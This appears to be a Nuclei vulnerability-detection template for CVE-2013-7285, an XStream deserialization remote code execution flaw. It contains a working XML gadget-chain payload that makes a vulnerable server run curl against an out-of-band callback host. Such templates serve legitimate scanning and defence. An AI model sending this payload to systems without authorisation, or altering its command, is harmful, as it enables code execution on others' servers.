67 lines
2.5 KiB
YAML
67 lines
2.5 KiB
YAML
id: CVE-2013-7285
|
|
|
|
info:
|
|
name: XStream <1.4.6/1.4.10 - Remote Code Execution
|
|
author: pwnhxl,vicrack
|
|
severity: critical
|
|
description: |
|
|
Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
remediation: |
|
|
Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://x-stream.github.io/CVE-2013-7285.html
|
|
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html
|
|
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html
|
|
- https://nvd.nist.gov/vuln/detail/cve-2013-7285
|
|
- https://blog.csdn.net/Xxy605/article/details/126297121
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2013-7285
|
|
cwe-id: CWE-78
|
|
epss-score: 0.33561
|
|
epss-percentile: 0.96568
|
|
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: xstream_project
|
|
product: xstream
|
|
tags: cve,cve2013,xstream,deserialization,rce,oast
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<sorted-set>
|
|
<string>foo</string>
|
|
<contact class='dynamic-proxy'>
|
|
<interface>java.lang.Comparable</interface>
|
|
<handler class='java.beans.EventHandler'>
|
|
<target class='java.lang.ProcessBuilder'>
|
|
<command>
|
|
<string>curl</string>
|
|
<string>http://{{interactsh-url}}</string>
|
|
</command>
|
|
</target>
|
|
<action>start</action>
|
|
</handler>
|
|
</contact>
|
|
</sorted-set>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: curl"
|
|
|
|
# digest: 490a0046304402202b9175c0bbaaec54c4732759e819f1a70dd838fdb56c53e143a021d10850f23b0220095a89fa91b9e1216a6c9d00ee669644d59e08eb3d33ee67f1c136939213a17b:922c64590222798bb761d5b6d8e72950
|